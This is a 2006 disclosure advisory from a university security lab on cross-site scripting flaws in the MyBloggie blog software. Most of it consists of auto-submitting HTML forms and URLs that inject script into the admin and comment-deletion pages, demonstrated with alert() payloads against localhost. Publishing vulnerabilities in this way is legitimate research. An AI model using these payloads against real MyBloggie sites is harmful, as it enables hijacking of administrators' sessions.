MyBloggie (mybloggie.mywebland.com)
Versions 2.1.3 beta and prior.
There are multiple cross-site scripting (XSS) vulnerabilities which can be verified by using the following
exploits (the user needs to be logged in). They are roughly sorted by entry points (i.e., the names of the
files that have to be navigated). The vulnerabilities were discovered under the assumption that
register_globals is on, and that magic_quotes_gpc is off.
delcomment.php, 61 (2x):
<form
action="http://localhost/mybloggie213beta/index.php?mode=delcom&comment_id=1&redirect=adm&confirm=yes"
method="post">
<input type="text" name="post_id" value='">xss_string' />
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
directly injecting "script" tags via the "post_id" parameter does not work,
requires an alternative attack:
delcomment.php, 48:
<form action="http://localhost/mybloggie213beta/index.php?mode=delcom&comment_id=1" method="post">
<input type="text" name="post_id" value='">xss_string' />
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
upload.php, 136:
http://localhost/mybloggie213beta/admin.php?mode=upload&del=xss_string
upload.php, 211:
http://localhost/mybloggie213beta/admin.php?mode=upload&message=xss_string
function.php, 578
from addcat.php, 70:
<form
action="http://localhost/mybloggie213beta/admin.php?mode=addcat&errormsg=<script>alert('xss_string')</script>"
method="post">
<input type="text" name="cat_desc" value='' />
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
from edituser.php, 88:
<form
action="http://localhost/mybloggie213beta/admin.php?mode=edituser&id=1&pass=yes&errormsg=<script>alert('xss_string')</script>"
method="post">
<input type="text" name="password" value='' />
<input type="text" name="repassword" value='' />
<input type="text" name="user" value='' />
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
from adduser.php, 64:
<form
action="http://localhost/mybloggie213beta/admin.php?mode=adduser&errormsg=<script>alert('xss_string')</script>"
method="post">
<input type="text" name="password" value='' />
<input type="text" name="repassword" value='' />
<input type="text" name="user" value='x' />
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
from editcat.php, 93:
<form
action="http://localhost/mybloggie213beta/admin.php?mode=editcat&errormsg=<script>alert('xss_string')</script>"
method="post">
<input type="text" name="cat_desc" value='' />
<input type="submit"/>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
function.php, 602
from add.php, 270:
<form action="http://localhost/mybloggie213beta/admin.php?mode=add" method="post">
<input type="text" name="submit" value='xyz' />
<input type="text" name="message" value='xyz' />
<input type="text" name="trackback_url" value='<script>alert("xss_string")</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
automatic submission via JavaScript does not work here,
requires an alternative mechanism
from deluser.php, 49:
from delcat.php, 48:
from del.phph, 39:
The authors have not responded to our messages, so there is no solution to these issues yet.
Timeline:
February 18, 2006:
Vulnerabilities indicated via mwsean at gmail dot com, but no response.
March 9, 2006:
Advisory submission.
http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-002.txt
Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at